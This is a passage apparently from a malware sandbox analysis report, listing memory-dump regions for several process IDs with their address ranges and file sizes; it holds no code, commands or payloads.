                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        10.8MB

                                                                                                                                                                                                                      • memory/3956-4-0x00007FFED1620000-0x00007FFED20E1000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        10.8MB

                                                                                                                                                                                                                      • memory/3956-3-0x00007FFED1620000-0x00007FFED20E1000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        10.8MB

                                                                                                                                                                                                                      • memory/3956-10-0x000001BB56610000-0x000001BB56632000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        136KB

                                                                                                                                                                                                                      • memory/4092-565-0x00007FFEEF5D0000-0x00007FFEEF7C5000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        2.0MB

                                                                                                                                                                                                                      • memory/4092-564-0x000001F8F4720000-0x000001F8F474A000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        168KB

                                                                                                                                                                                                                      • memory/4092-566-0x00007FFEEECA0000-0x00007FFEEED5E000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        760KB

                                                                                                                                                                                                                      • memory/4120-562-0x0000000000BB0000-0x0000000000BB9000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        36KB

                                                                                                                                                                                                                      • memory/4120-56-0x0000000000BB0000-0x0000000000BB9000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        36KB

                                                                                                                                                                                                                      • memory/4120-1553-0x0000000000BB0000-0x0000000000BB9000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        36KB

                                                                                                                                                                                                                      • memory/4904-55-0x00007FFED1623000-0x00007FFED1625000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        8KB

                                                                                                                                                                                                                      • memory/4904-154-0x00007FFED1620000-0x00007FFED20E1000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        10.8MB

                                                                                                                                                                                                                      • memory/4904-0-0x00007FFED1623000-0x00007FFED1625000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        8KB

                                                                                                                                                                                                                      • memory/4904-99-0x00007FFED1620000-0x00007FFED20E1000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        10.8MB

                                                                                                                                                                                                                      • memory/4904-1-0x0000000000E90000-0x0000000000EDE000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        312KB

                                                                                                                                                                                                                      • memory/4904-2-0x00007FFED1620000-0x00007FFED20E1000-memory.dmp

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        10.8MB